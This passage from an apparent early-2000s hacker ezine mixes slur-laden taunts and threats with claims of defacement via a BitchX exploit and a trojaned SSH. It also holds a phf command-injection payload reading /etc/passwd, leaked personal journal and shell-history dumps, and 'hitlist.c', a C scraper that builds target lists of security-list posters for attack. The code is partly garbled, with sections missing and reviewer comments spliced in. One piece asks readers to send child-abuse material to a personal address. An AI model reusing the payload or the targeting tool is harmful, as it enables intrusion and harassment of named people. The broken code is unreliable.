me: "y0 phuck 1cy h0t kuz theyre cheaterz... everyb0dy kn0wz cuz wez eleEeter.... 1f 1 ever s4w bl4d3 1d st4b h1m w1th a t00thp1ck, 1c3 l1v3z w1th h1z m0m & 1 h34r fl4m3z g0t a sm4ll d1ck.... 
y0 y0 aiy0 d0nt step 2 my krew, kuz 1ll fuqn k4p y0u. f00. t4p t4p ch3q." d4mn! iz all i k4n s4y, koz th3 c0c00n 1z full 0f th1s sh1t. 4ngry lyrix... th3y t4lk ab0ut st4bb1ng th3ir l4wyerz 1n c0urt, dr1nk1n 40z wh1le talkin on th4 I SEEK Y0U, buztn 0ut 0f j41l l1ke n3d k3lly, b1tch3z 1n h1gh sk00l th@ cheat 0n algebr4 t3stz, h0w much p4y1ng ch1ld supp0rt 4 a bunch 0f k1dz suxxxx, m4n 1 d0nt even want 2 sp0il th1z, itz tru-thug. pers0nally my fav0r1te tr4ckz 0f th1z cd r #2. CHEATERZ & #11. THE COURTR00M and 13. SH0W THEZE k4TZ (lab3ll3d 0n th31r webs1te az *H0T*). wh4t3v3r they d3c1d3 2 d0, r00tabega k33pz a p0s1t1v3 1m4g3. r1sh1, 4z y0ung 1nd14n b0y gr0wn up 1n th3 gh3tt0 h4d 2 s1t by and w4tch h1z y0unger br0ther wear1ng a ch1cag0 bullz jerzey get gunn3d d0wn 2 d34th by cr1pz. s331ng s0 much vi0lence in h1z d4y, & w4tch1ng h1z g00d h0meb0yz m0st8d & l00ph0le & m1ndphazr g0 2 the p3n, he m0urnz 4 th31r return & the dayz 0f tru defac3m3nt thugg3ry. 1n hiz s0ngz, he expl41nz, h0w new sk00l def4c3rz just d0nt underst4nd what 1t uz3d 2 m34n 2 the el8z, the gHerz, the 3lv3z. th1z album 1z def1n1tely a 2 thumbz up. w00w00 ------ ch3ck 1t 0ut @ http://www.w00w00.org/w00w00.mp3 w1th 0ver 30 memb3rz w0rldw1de & th1z 1z the b3st sh1t they k0uld k0me up w1th!?!?!?!? th1z 1z fuqn kr4p, 1tz even w0rse than th31r k0d3z. w0uld u listen 2 a k0p r4pp1ng? 0k damn, s0 why the phuq w0uld u l1st3n 2 a bunch 0f wh1teh@ l4m3rz pr3t3nd1ng 2 haq. 1f 1 were 1n the wu-t4ng kl4n 1 w0uld kut their n*tz 0ff, espec14lly th@ n4spt3r f4g. m1xt3r ------ 0k well th1z 1znt r34lly "thugg1sh" but 1tz undergr0und h4qr muz1k s0 uncle m4v1s dec1d3d 2 rev1ew 1t just 4 u. & th1z 1z n0 disappo1ntment e1th3r. m1xter haz sh0wn he d0eznt just kn0w h0w 2 wr1te wh1tepap3rz 4 packetst0rm, he k4n als0 wr1te s0me ph@ muz1k 2! m1xt3r d0eznt even try 2 be a thug, h3z just pure h4qr. w1th s0ng n4m3z like "/usr/bin/strings" and "1ntrusi0n det3kt3d" and "/cgi-bin/phf?Qalias=%0acat%20/etc/passwd." 
1 def1n1tely w0uld n0t rec0mmend th1z 4 l1st3n1ng 2 pe0ple outs1d3 0f the 'sc3n3' becuz it iz 1nf0rmation 0verl0ad! but 4 th0ze 0f u wh0 th1nk u h4v3 wh4t 1t t4k3z 2 dec1ph3r hiz kryptik msgz, u k4n f1nd h1z muzik @ http://www.mp3.com/mixter/ th3z3 s0ngs rem1nd me a l0t 0f th1z 0ne t1me 1 s4w th3z3 2 austrian d00dz french k1ss1ng each0ther in an 'E wild 0n 1b1z4.' but enuf of th@ /usr/bin/strings s0undz a bit retro, with s0me atar1 l1ke s0undz 2 rem1nd u of exactly h0w 0ld sk00l m1xter really is, & synthlinez th@ w0uld bl0w depeche m0de 0ut 0f the w4t3r. m1xt3r, as he l1k3z 2 r3f3r 2 himself az 'DJ MIXY' 2 th3 r3st 0f the w0rld 0fferz h1z serv1c3z 2 th3 c0mmun1ty by dj'ing in s4f3 drug phr33 b4r m1tvahz in t3l av1v, where h1z t0pn0tch internet sekur1ty k0mpany w1th phell0w h4ck1ng st4rz ANALYZER and IZIK of hwa-security/d4rkn3t 1z l0c8d. s0met1m3z when he iz juzt "chiln 0ut" he k4n be f0und d4nc1ng @ w1ld r4v3z @ the g4z4 str1p w1th h1z p4t3nt3d redwhite'nblue gl0wst1ckz & vickz inh4l3r. but h3 d03z m0st 0f h1z w0rk 4 fr33, s1nc3 az m4ny grey/bl4ckhatz he shunz the c0mmercializ4t10n 0f s0phtjuarez & releasez hiz trax under GPL! he als0 h0pez th@ 0ne day s0meb0dy w1ll B insp1r3d by h1z s0ngz 2 0wn a univers1ty netw0rk w1th m1cr0s0ft w1nd0wz src k0de & d0n8 the ph1nd1ngz 2 him! ~el8 4tt3mpt3d 2 k0nt4kt mixter 4 an 1nterv1ew ab0ut h1z muz1k but he angrily d3kl1n3d, s4y1ng he w0uld never 't4lk 2 u squinty 3y3d m0th3rphuckrz' as l0ng 4s 'th3 br34th 0f l1fe fu3l3d h1z b0dy.' h3 th3n ch4ll3ng3d uncle m4v1s 2 "get my passw0rd ph1le again" s1nce h1z b0x d0eznt all0w 0utg01ng em41lz 2 j4p4n anym0r3. th1z wuz unfphortun8 but 4 the s4ke 0f 0bjekt1v1ty uncle m4v1s g1vez thiz album a "p0sitive" rev1ew. y0 well th@z all the muz1k 1 k0uld find 4 n0w! r3m3mb3r 2 k33p 1t r34l peace 0ut d/-\wGz. .~e~----------------------------------------------------------~e~. 
; *06* defacements of the milenium -- ~el8 ; `----------------------------------------------------------------' -----------------------. anti.security.is owned 0 ~~~ :PpPPppPPPp -----------------------' turkey Oh, life it's bigger, it's bigger than you and you are not me The lengths that I will go to, the distance in your eyes WE ARE THE HACKERS WHO ACTUALLY HACK. UNLIKE OTHER "HACKERS," WE DON'T SIT ON OUR WAREZ. ACTION SPEAKS LOUDER THAN SILLY WORDS. GOBBLES IS ABOUT GETTING THINGS DONE. THANKS TO THE POP PSYCHOLOGISTS ON THE ANTISEC MESSAGE BOARD. YOUR COMBINED PSYCHOANALYSIS MISSED UNCONTROLLABLE URGES TO DEFACE SECURITY WEBSITES THOUGH! 2002 IS YEAR OF TURKEY. MAKE NO MISTAKE ABOUT THIS. AND THERE'S NOTHING ANYONE CAN DO... THIS HACK MADE POSSIBLE WITH BITCHX REMOTE EXPLOIT AGAINST JIMJONES HOME COMPUTER THEN TROJANING HE SSH TO COLLECT PASSWORDS... ------------------------. udp's livejournal owned 0 ~~~ :PpPPppPPPp ------------------------' [2041] udp the lame phrack whore's LiveJournal [Most Recent Entries] [Calendar View] [Friends] Below are the 20 most recent journal entries recorded in udp the lame phrack whore's LiveJournal: [ << Previous 20 ] Monday, December 31st, 2001 12:42 pm Been rereading Leisure Town and laughing my ass off. (Comment on this) 11:38 am owned in the 2002 yo chek it, im fat & owned keep it re4l libnetx25 el8.8m.com watch your back we out (Comment on this) Sunday, December 30th, 2001 4:12 pm Add Hope Sandoval to the list from the 25th. Fantastic. :) Current Music: Mazzy Star - Wild Horses(2 Comments |Comment on this) 1:38 pm mmm. the big chill. you must get this track. Current Mood: chillllled Current Music: Mescalito - Shoreditch Oyster(Comment on this) 1:23 pm Desi-derata. Current Mood: caffeinating Current Music: Mescalito - Dark Corner Light(Comment on this) Saturday, December 29th, 2001 10:10 pm hrm. looking at wmglobe, again, it seems most of the populated human world is in darkness right now. whack. 
the sun's shining high above the pacific; the pacific's enormous. Current Music: Veruca Salt - Bodies(Comment on this) 3:14 pm Obviously CURRENT doesn't like my dirty hack of hijacking the IPPROTO_RSVP pointer in ip_protosw[]. (Comment on this) 3:09 pm the sun is out. free of its grey bonds finally. eclectic love washing over the city. (Comment on this) 2:57 pm Bah! I just loaded my driver into -CURRENT - BOOM! Works fine on -STABLE though. Oh well, hacking time... (Comment on this) 11:47 am Protected A rare sighting *o* mudge [~mudge@0nus.l0pht.com] has joined #cdc *o* irc.carrier1.net.uk Saturday December 29 2001 -- 11:44:25 +00:00 Hm! Just as I was about to head out for lunch, too... (Comment on this) 11:43 am Musings on zen and singing. An overcast day in London today. Dull grey cloud settled over the city like white taffy, hydrogenated, a smooth constriction. I rise, wash, put my boots on and make coffee. I feel the cool air rise against my damp, freshly depilated skin. The thermostat clicks as the heater switches off, the aesthetic of warmth lost on the machine, for it is thus. I run my hand over my forehead, and around my fringe. I smile, knowing what it is to live in the moment, and that though our best laid plans and fondest dreams may never come to fruition, living in the moment is that which is most important. After a spate of not being able to sleep well, I suddenly find myself enjoying the most pleasant, restful night's sleep, and this has been the case some three nights in a row now. Last night my final thought before leaving wakefulness was this: how does Kate Bush feel about her success and her life? I wonder if she has always wanted to be where she has gotten to. I think one could well ask these questions of any successful person. Is it atypical to be blown off one's original course, and yet still discover one's own New World? Or is it an occupational hazard? When hungry, eat. When tired, sleep. 
(Comment on this) 12:25 am There are some screen grabs of my desktop from today here. (3 Comments |Comment on this) Thursday, December 27th, 2001 1:26 pm Ok. I submitted 7 new FreeBSD ports inside 12 hours. Can I have a biscuit? (2 Comments |Comment on this) 7:24 am Submitted FreeBSD port for x11-fonts/gfe (GNU Font Editor 0.0.4). (Comment on this) Wednesday, December 26th, 2001 10:05 pm Without memories, a race has no future. (3 Comments |Comment on this) Tuesday, December 25th, 2001 1:20 pm A quiet day of fond restitude, for the weary traveller. Mmmm. Having a very chilled out Yule; curling up with some Baileys and wotnot, listening to music and reading books. What a holiday should be at this time of year, I think. A time to nurture dreams anew and sow amongst the furrows of the psyche. Been on a different tack with mp3 playlists lately, need female vocalists to pace out all this D'n'B, industrial, trance... so this manifests itself in the form of Tori Amos, Paula Cole, Beth Orton, Alison Moyet, Louise Post (of Veruca Salt fame), Sarah McLachlan, and of course, Kate Bush. As for the delectable Ms Bush, she will hopefully have an album out during 2002, which I am looking forward to with anticipation. I still hold Wuthering Heights to be one of her best tracks of all time... In the meantime, you might like to check out Paula Cole's work. She teamed up with Peter Gabriel on his Secret World Tour in 1993, and you can hear her passion, and diverse vocal range, on tracks such as Talk To Me and Hush Hush Hush. Those of you who are fans of Peter Gabriel also will also clock that Peter's last longstanding female vocal partner was... stand up, Kate Bush! As a longstanding fan of Peter's work I have to say I admire his knack for working with the female voice. 
He confessed that it was a skill he acquired over many years, in an interview on ITV (1993, UK); indeed much of his work from the late 1970s, after he split from Genesis, took on more of a masculine edge than what one experiences from his albums So (1986) and Us (1992); the latter was produced by the brilliant Daniel Lanois, featured on U2's superb Achtung Baby (1990). Paula, however, reveals a much flirtier side to her work, in a song from the motion picture soundtrack for the Wim Wenders film City of Angels, a track entitled Feelin' Love. As you can see from the lyric sheet, it's quite candid, but you really have to hear her singing this; she manages to come across as sensual without being kitsch or trashy. It's a departure from her other tracks, lest we begin to think the adorable Miss Cole is a goody two-shoes. I can't really put into words how enthused I am by her talent. Her voice helps to create a fertile creative space for me; it's only over the past two years or so that I've begun to realize how essential the immediate environment is to the creative act, be that making music, writing code, sculpting; or any other form of play. Isolation alone is not the way to get the job done; often it's good to invite a bunch of friends over, share the Baileys or Jasmine tea or whatever the tipple is, and then return to one's work, having given the machine-mind a rest and returned to social consciousness, if only for a few hours. My plans for 1Q 2002 are still being worked on; I also need to decide what to do this upcoming summer. I'm open to suggestions for places to visit, hang out, have a good time. And like that rubberband girl in the red shoes, I bounce back on my feet. Fond greetings to friends present and past, in whatever mode you choose to celebrate the Solstice; I wish you all well. Current Mood: pleasantly inert Current Music: Kate Bush - Rubberband Girl(1 Comment |Comment on this) Thursday, November 29th, 2001 2:16 pm Just woke up. Urrrrrrrrgggggh. 
Upgraded the -CURRENT box late last night - the change alone from a Realtek to an Intel FXP makes a *massive* difference. FreeBSD now supports every single bit of hardware in the box. Matt Dillon gave an interview very recently where he cites the current SMPng work and the OpenGL support as the main hurdles to be overcome for FreeBSD at the moment. I agree - once OpenGL support is in place, I will have very little reason to run Windows, or even Linux, for that matter, ever again. One exception is IrDA support, but I might choose to port that anyway. Anyway. I'm eating a pot rice at the moment, deferring real food until we (people are here) decide what we're going to do. *stretches* (Comment on this) Wednesday, November 28th, 2001 11:11 am Is it any wonder I can't sleep? (apologies to Smashing Pumpkins) Woke up at 10pm last night, my sleeping pattern is TOTALLY shafted... it's out of control, and the kids just love it! (props to KMFDM...) As of this morning I've written FreeBSD ports entries for Dug Song's libdnet, a portable packet generation and low-level networking API, and Tony Curtis's wots, which is an extremely cool system log monitoring program written in Perl. I've been using wots for literally years now. Rock on. Hopefully other people will find them useful. qtop is working spankingly for my droptail queues on the WaveLAN gateway, but I need to clean up the code, fix it to work with RED/wRED dispatcher, and get it committed to FreeBSD-CURRENT. Current Music: Technical Itch - Deadline(Comment on this) Monday, November 26th, 2001 9:25 am Access granted. I've just written and released a tool to perform real-time monitoring of the FreeBSD Bandwidth Shaper, as part of the Consume Project. It's essential that we be able to throttle bandwidth on a per-node basis to prevent wired links to the mobile cloud becoming saturated. This tool will help us to configure the bandwidth shaper at each node. 
Getting the hang of the masking for the packet flow sets is quite tricky; this will help the community networking effort by allowing people to experiment with bandwidth throttling and getting visual (as well as anecdotal) feedback on the effect of their configuration changes. You MUST get the track I'm listening to. At the moment I'm pretty frazzled on caffeine having been awake for most of the weekend and Friday, and have the heating turned down to keep me frosty. Oh yeah. What else is cool. ParMaster hung with us at the weekend. Current Mood: accomplished Current Music: Apoptygma Berzerk - Kathy's Song (Ferry Corsten Remix)(1 Comment |Comment on this) Monday, November 19th, 2001 3:06 am ick, writing parsers is such a chore. (Comment on this) [ << Previous 20 ] My Website About LiveJournal.com .~e~----------------------------------------------------------~e~. ; *07* ~el8 hitlist tools -- uncle m4v1s ; `----------------------------------------------------------------' ~el8 ~el8 has has generated generated hitlists hitlists for for every every security security related related mailing mailing list list known 4r3z known to urfukd to mankind mankind h3re y0u g0 d00dz, str8 fr0m the ~el8 w4r3z gr4bb4g. th1s t00l w1ll h3lp 0ur f0ll0w3rz by cre4t1ng h1tl1sts of emails/systems that p0st t0 vari0uz security f0cus mailing lists. 
~el8 ADVISORY STYLE S0LLUTI0N: d0nt p0st t0 th3z3 mail1ng lizts ex4mple 0utput: $ ./hitlist 1 LAMER: sh0@libertynet.de (sh0) LAMER BOX: cybersilo.lnx LAMER: tsmith@zonelabs.com (Te Smith) LAMER BOX: mail.securityfocus.com LAMER: merchantjosh@qwest.net (Joshua Merchant) LAMER: draht@suse.de (Roman Drahtmueller) LAMER BOX: dent.suse.de LAMER: secnotif@microsoft.com (Microsoft Product Security) LAMER: newsflash@macromedia.com (Macromedia Security Alert) LAMER BOX: rsigate.macromedia.com LAMER: joacim@axis.com (Joacim Tullberg) LAMER BOX: mail.securityfocus.com LAMER: tluce@pti-pump.com (Timothy Luce) LAMER BOX: PTIPump.com LAMER: support_feedback@us-support.external.hp.com (IT Resource) LAMER: wichert@wiggy.net (Wichert Akkerman) LAMER BOX: wiggy.net LAMER: raistlin@gioco.net (Raistlin) LAMER: cadence@apollo.aci.com.pl (Tomasz Grabowski) LAMER: dotslash@snosoft.com (KF) LAMER BOX: snosoft.com LAMER: flatline@blackhat.nl (flatline) LAMER BOX: mail.werkopmaat.nl LAMER: adonis1@videotron.ca (Adonis.No.Spam) LAMER BOX: videotron.ca LAMER: gobbles@hushmail.com LAMER BOX: mailserver1.hushmail.com LAMER: seclsts@fast.net (Rich Henning) LAMER BOX: fast.net LAMER: alexm@pycckue.org (alex medvedev) LAMER: pr0ix@def-con.org (pr0ix) [CUT_HERE] hitlist.c /* * l4m3r l1zt3r v1.0 by uncle m4v1s * th1z 1z a s1mple t00l th@ ~el8 haz been uzing 4 several ye4rz, * ever s1nce pr0ject m4yh3m wuz 1st st4rt3d. * 1tz a 1-use t00l, juzt run th1z on any 0ne of the k-l4m3 * s1tez upd8d by secur1tyf0cus.com on the1r ml-p0rtal, & * u n0w h4ve a l1zt 0f ret4rdz 2 hack and st34l "0day" from. * th1zt skr1pt g0ez back s3v3ral ye4rz s0 u get the ch4nc3 2 * ch3ck 0ut r34l b0xez th@ were uz3d be4 the gr34t p4n-l4m3r * 3ff0rt 2 get sc3n3 sh3llz 2 h1de the1r 1dent1t3z. 
* by t4rg3tt1ng p0stz by p0l1te sekur1ty pr0fess10nalz & * 0wn1ng the1r `sh1t` and r4v4g1ng th3 kn0wn_h0stz 0n the ab0ve * b0x3z, we n0t1c3d the subtl3 c0rrel4t10n betw33n m4n & myth, * 4nd st4rt3d 2 rek0gn1z3 the k0rrel4t10n betw33n REAL PEOPLE & * the 0nl1ne 1dent1t3z they assum3d. 4 example, 0wn 4ll russ14n * bugtraq p0st3rz s1nce 1997 and u w1ll n0t1c3 4t l34zt 0ne 0f * th3m l0gg1ng 1nt0 z0l0.fr33lsd.n3t/c4nn4b1z.dataf0rce.net (hi str!) * 4nyh0w, 4z rule #2 of pr0jekt m4yh3m g0ez, if u c4nt st34l w4r3z * 0r sn1ff, rm the fukrz! * h4ppy hunt1ng */ #include #include #include #include #include #include #include #include #include #include #define PREFIX "GET http://online.securityfocus.com" #define BASE_CMD "GET http://online.securityfocus.com/archive/1" struct sockaddr_in sinz; struct target{ char *lamercode; char *url; } targets[] = { {"ARIS USERZ","GET http://online.securityfocus.com/archive/114"}, {"bugtraq[lol]","GET http://online.securityfocus.com/archive/1"}, {"bugtraq-es (bugtraq in spain jajaja)", "GET http://online.securityfocus.com/archive/80"}, {"bugtraq-jp & shadowpenguin friendz", "GET http://online.securityfocus.com/archive/79"}, {"cisspstudy [inspired by dr. 
crispin cowin]", "GET http://online.securityfocus.com/archive/99"},
{"focus-ids [cant sekure a b0x so they use ids]", "GET http://online.securityfocus.com/archive/96"},
{"choose this if u have linux 0day", "GET http://online.securityfocus.com/archive/91"},
{"choose this if u have win32 0day", "GET http://online.securityfocus.com/archive/88"},
{"choose this if u have solaris 0day", "GET http://online.securityfocus.com/archive/92"},
{"scan here for bo2k", "GET http://online.securityfocus.com/archive/100"},
{"forensics (prolly not worth it, they r already 0wned)", "GET http://online.securityfocus.com/archive/104"},
{"honeynet [leave burneye encrypted kopiez" " of nmap 4 lance sp1tzner here]", "GET http://online.securityfocus.com/archive/119"},
{"incidents [see how well pr0ject m4yh3m is d0ing", "GET http://online.securityfocus.com/archive/75"},
{"pen-test [people like s1 here hehe]", "GET http://online.securityfocus.com/archive/101"},
{"sec-papers [4 the literary inkl1n3d like warzael zarcae", "GET http://online.securityfocus.com/archive/112"},
{"security-basics PAHAHAHAHAHA n3wb13z ripe 4 the picking", "GET http://online.securityfocus.com/archive/105"},
{"security-certification [l4m3rz who have subskr1b3d" " 2 security-basics longer than 2 weekz", "GET http://online.securityfocus.com/archive/106"},
{ "security-jobs [own theze fuckerz quick, they r desperately" " trying 2 publish 0day]" ,"GET http://online.securityfocus.com/archive/77"},
{"vpn [hehe launch pptphack here]", "GET http://online.securityfocus.com/archive/50"},
{"vuln-dev <- th3 m0ther l4m3r sh1p h4z l4nd3d", "GET http://online.securityfocus.com/archive/82"},
{"choose this if u have shopping kart cgi po1z0n byte warez", "GET http://online.securityfocus.com/archive/107"}
};
/* targets[] above: each entry pairs a menu label with the request line for
 * one archive index page; main() picks an entry by the numeric argument
 * (startpoint=targets[choice].url). Line breaks in this stretch were
 * restored by the reviewer; the listing had been collapsed by extraction. */

/*
 * printdates - print the date range encoded in an archive index path.
 * url is expected to look like "/archive/1/YYYY-MM-DD/YYYY-MM-DD/"; the six
 * numeric fields are parsed with sscanf() and printed as M/D/Y ranges.
 * Prints nothing when "/archive/1/" does not occur anywhere in url.
 * NOTE(review): the strstr() result (ptr) is never used afterwards; sscanf()
 * parses from the start of url, so a url in which "/archive/1/" is not at
 * offset 0 fails the num!=6 check and prints the parse-error line instead.
 */
void printdates(char *url) {
    char *ptr;
    int bday,bmonth,byear,eday,emonth,eyear,num;
#define MAGIC "/archive/1/"
    ptr=strstr(url,MAGIC);
    if(ptr==NULL) return;
    num=sscanf(url, "/archive/1/%d-%d-%d/%d-%d-%d/"
        ,&byear,&bmonth,&bday,&eyear,&emonth,&eday);
    printf("LAMER CHRONOLOGY: ");
    if(num!=6) printf("ERROR IN PARSING BUT WH0 KAREZ\n");
    else printf ("%d/%d/%d to %d/%d/%d\n", bmonth,bday,byear,emonth,eday,eyear);
    fflush(stdout);
}

/*
 * makeurl - build the request line "<PREFIX>/<end>\r\n" (no HTTP version is
 * appended) for a relative archive path. Returns a freshly malloc'd string
 * owned by the caller; main() frees it after sendcmd().
 * Size accounting: strlen(PREFIX) + '/' + strlen(end) + "\r\n" + NUL is
 * exactly the +4, so the buffer is filled with no slack — any extra strcat()
 * here must adjust the size computation as well.
 * NOTE(review): on malloc() failure this shells out through system() before
 * exiting; an allocation-failure path should not spawn /bin/sh at all.
 */
char *makeurl(char *end) {
    char *r;
    int size=strlen(PREFIX)+strlen(end)+4;
    r=malloc(size);
    if(r==NULL){
        fprintf(stderr,"hmm out 0f memory... might be 4 f0rq b0mb!\n");
        system("ps -u cr");
        exit(-1);
    }
    memset(r,0,size);
    strcpy(r,PREFIX);
    /* only add the separator when end is not already absolute */
    if(*end!='/') strcat(r,"/");
    strcat(r,end);
    strcat(r,"\r\n");
    return r;
}

/*
 * sendcmd - write the request string, then a line terminator.
 * NOTE(review): the second write() passes length 2 for the 4-byte literal
 * "\r\n\r\n", so only "\r\n" reaches the wire. For strings built by makeurl()
 * (which already end in "\r\n") that still produces an empty line; for the
 * initial startpoint request (BASE_CMD or a targets[].url, no trailing CRLF)
 * only a single CRLF is sent. Both write() return values are ignored, so
 * short writes and errors go unnoticed.
 */
void sendcmd(int fd,char *cmd) {
    write(fd,cmd,strlen(cmd));
    write(fd,"\r\n\r\n",2);
}

/*
 * connecthost - open a TCP connection to the address in the file-scope
 * sinz, which main() fills in (AF_INET, port 80, first gethostbyname()
 * address). Returns the connected descriptor; exits the process when
 * socket() or connect() fails.
 * NOTE(review): the socket() failure path runs a shell pipeline through
 * system() before exiting — an unnecessary side effect in an error handler.
 */
int connecthost(void) {
    int fd;
    fd=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
    if(fd<0){
        fprintf(stderr,"out of socketz... weird\n");
        system("ps aux|egrep tron|mixter|felix");
        exit(-1);
    }
    if(connect(fd,(struct sockaddr*)&sinz,sizeof(sinz))<0){
        fprintf(stderr, "cant connect to online.securityfocus.com...project mayhem successfully accomplished!\n");
        exit(-1);
    }
    return fd;
}

/*f-fgetz*/
/*
 * readline - read one line from fd into a static 8192-byte buffer.
 * NOTE(review): the loop body, the return statement and the header of the
 * function that follows were lost in extraction (everything between
 * "for(i=0;i" and "Message-ID:<" is missing), so the termination condition
 * and the per-byte read cannot be reviewed here. What is visible: the
 * buffer is static and zeroed on every call, so a pointer handed back is
 * only valid until the next call (letitrip() keeps its piece via strdup()).
 */
char* readline(int fd) {
    static char buf[8192];
    char yo;
    int i = 0;
    memset(buf,0,sizeof(buf));
    for(i=0;iMessage-ID:<");
/*
 * NOTE(review): from here on is the body of a function whose header was lost
 * with the readline() loop above (it uses l, ptr, startbox, startemail and
 * startname, and ends with close(fd) after its read loop). It scans each
 * line for ">Message-ID:<" to pick out the host part after '@', otherwise
 * for ">Author:<" plus "mailto:" to pick out an address and display name;
 * every strchr()/strstr() result is NULL-checked before use and the matched
 * fields are NUL-terminated in place inside the line buffer.
 * NOTE(review): isalnum(*ptr) below is applied to a plain char taken from
 * network input; for bytes above 0x7f that is undefined behaviour where char
 * is signed — cast to (unsigned char) before calling any <ctype.h> function.
 */
if(ptr==NULL) goto checkauthor;
ptr+=13;
ptr=strchr(ptr,'>');
if(ptr==NULL) goto checkauthor;
ptr++;
ptr=strchr(ptr,'>');
if(ptr==NULL) goto checkauthor;
while(*ptr&&*ptr!='@') ptr++;
if(!*ptr) goto checkauthor;
ptr++;
startbox=ptr;
while(*ptr&&(isalnum(*ptr)||*ptr=='.')) ptr++;
if(!*ptr) goto checkauthor;
*ptr=0;
/*s4n1tych3ck*/
/* a host part without a dot is dropped rather than printed */
if(strchr(startbox,'.')==NULL) goto heh;
printf("\t\tLAMER BOX: %s\n",startbox);
goto heh;
checkauthor:
ptr=strstr(l,">Author:<");
if(ptr==NULL) goto heh;
ptr+=10;
ptr=strstr(ptr,"mailto:");
if(ptr==NULL) goto heh;
ptr+=7;
startemail=ptr;
ptr=strchr(ptr,'"');
if(ptr==NULL) goto heh;
*ptr++=0;
ptr=strchr(ptr,'>');
if(ptr==NULL) goto heh;
startname=++ptr;
ptr=strchr(ptr,'<');
if(ptr==NULL) goto heh;
*ptr=0;
printf("\tLAMER: %s",startemail);
if(strlen(startname)) printf(" (%s)",startname);
printf("\n");
fflush(stdout);
heh:
l=readline(fd); } close(fd); } /*cykle thru ind3z p4g3z*/ char *letitrip(int fd) { char *l=readline(fd); char *ptr,*start=NULL,*nexturl=NULL,*lamerpost; while(l!=NULL){ /*YO*///printf("line = %s\n",l); /*try p0stz first*/ #define SEKRETKEY "
'); if(ptr==NULL) goto heh; ptr++; if(strstr(ptr,"prev Week")==NULL) goto heh; /*w0rd here iz the previ0uz week*/ if(nexturl==NULL) nexturl=strdup(start); heh: l=readline(fd); } return nexturl; } int main (int argc,char **argv) { struct hostent *he; int fd; char *newurl,*startpoint; if((argc>2)||((argc==2)&&(!strcmp(argv[1],"-h")))){ int i; fprintf(stderr, "l4m3rl1zt3r usage: %s <#>\nwhere # is a l4m3r k4t3g0ry, defaultz 2 bugtraq\n\n",argv[0]); fprintf(stderr,"l4m3r k4t3g0r1ez:\n"); fprintf(stderr,"-----------------\n"); for(i=0;i=(sizeof(targets)/sizeof(struct target))){ fprintf(stderr,"s0rry kouldnt find specif1ed l4m3r...\n"); fprintf(stderr, "there r many more lam3rz, ~el8 iz working ar0und" " the cl0q 2 upd8 thiz program with the necessary 2385915 entriez.\n"); fprintf(stderr,"try a valid # tho\n"); exit(-1); } startpoint=targets[choice].url; } else startpoint=BASE_CMD; fprintf(stderr,"l4m3rl1zt3r v1.0\n"); fprintf(stderr,"by uncle m4v1s\n"); fprintf(stderr,"k0pyright (K) 2002 ~el8 research labz\n"); fprintf(stderr,"for help, try -h\n\n"); he = gethostbyname("online.securityfocus.com"); if(he==NULL){ fprintf(stderr,"cant resolve online." 
"securityfocus.com...project mayhem successfully accomplished!\n"); exit(-1); } memset(&sinz,0,sizeof(sinz)); sinz.sin_family=AF_INET; sinz.sin_port = htons(80); memcpy(&sinz.sin_addr,he->h_addr,4); fprintf(stderr,"acquiring t4rget l1zt...!\n"); fprintf(stderr,"begin l4m3r l1st tr4nsm1ss10n!\n"); printf("------------------------------\n"); fd=connecthost(); sendcmd(fd,startpoint); printf("LAMER CHRONOLOGY: CURRENT\n"); fflush(stdout); newurl=letitrip(fd); close(fd); if(newurl==NULL){ fprintf(stderr,"weird..some un3xpekt3d sh1t happened!\n"); exit(-1); } while(newurl!=NULL) { char*req; fd=connecthost(); req=makeurl(newurl); sendcmd(fd,req); printdates(newurl); free(newurl); free(req); newurl=letitrip(fd); close(fd); } printf("-------------------------------------\n"); fprintf(stderr,"we h4v3 d3t3kt3d 4ll p0ss1bl3 l4m3rz!\n"); fprintf(stderr,"n0thing l3ft 2 d0..m4ybe ch3ck #!el8.\n"); fprintf(stderr,"-------------------------------------\n"); return 0; } [END_CUT] hitlist.c .~e~----------------------------------------------------------~e~. ; *08* bronc buster busted -- RLoxley ; `----------------------------------------------------------------' Hey guys, this is RLoxley (Robin Hood of Loxley) from hackphreak.org. I wanted to get my website in your ezine again, and tell everyone how ethical hacking is the best hacking ever. I have included bronc's bash history from one of my machines. Also, remember young hackers, if you break into a system, tell the admin how to patch it, do a good deed for society. If you hack any child porn people, turn them into authorities and send all of the downloaded movie/picture evidence to my personal account: rloxley@hackphreak.org. Stop child porn! 
Here it is: # cat .bash_history ssh -l bronc 2600.com ssh -l bronc 2600.com w ps aux|grep bronc kill -9 24409 24424 24428 ps aux|grep bronc w telnet localhost exit ssh -l bronc 2600.com w telnet localhost exit w ping succeed.net traceroute succeed.net su bogus exit ping succeed.net w -su BitchX bronc irc.freei.net traceroute succeed.net w telnet fingers exit su - exit ssh 2600.com exit vhosts BitchX bronc -H openGL.3dlinux.com irc.core.com BitchX BitchX bronc -H openGL.3dlinux.com BitchX bronc ls ls -l BitchX whereis BitchX ls -l /usr/local/bin/BitchX cd /usr/local/bin ls ls -l|more rm BitchX su - cd BitchX bronc -H openGL.3dlinux.com irc.core.com ifconfig vhosts BitchX bronc -H underpaid.sysadmins.com irc.core.com exit su - exit su - exit su - exit su - exit w finger lusta ps aux|more ps aux|grep ftp ftpusers su - ls cd ~ftp ls cd pub ls ftp fingers cd exit w clear exit w talk pt ls ls -l cygnus-20-full.exe su - exit ifconfig su - exit w su - su - su w fingew luat finger lusta finger pt cat /etc/suauth grep bronc /etc/group w su - grep root /etc/passwd cat /etc/motfd cat /etc/motd cd /var/log ls grep su messages|tail grep su messages|tail - 20 grep su messages|tail 30 grep su messages|tail -30 grep root messages|tail -30 ps aux|grep sendmail finger pt ssh fingers ssh fingers grep root messages|tail -30 grep root messages|grep su|tail -30 su - su - w uptime cd /etc ls -l passwd id cd ls cd ap ls cd .. ls w ssh lemon ssh lemon ssh gratefuk ssh grateful ssh grateful.org su bogus telnet grateful.org ssh fingers ssh fingers exit su - more .profile myvar hour myvar=`ifconfig|grep inet| awk -F: '{print $2}'` su - exit man ftp qcq pico ftptest mkdir test touch test.X ./ftptest chmod 777 ftptest ftptest pico ftptest ftptest pico ftptest ftptest pico ftptest ftptest mv test.X text.X ftptest cd test ls cat ftptest cd .. 
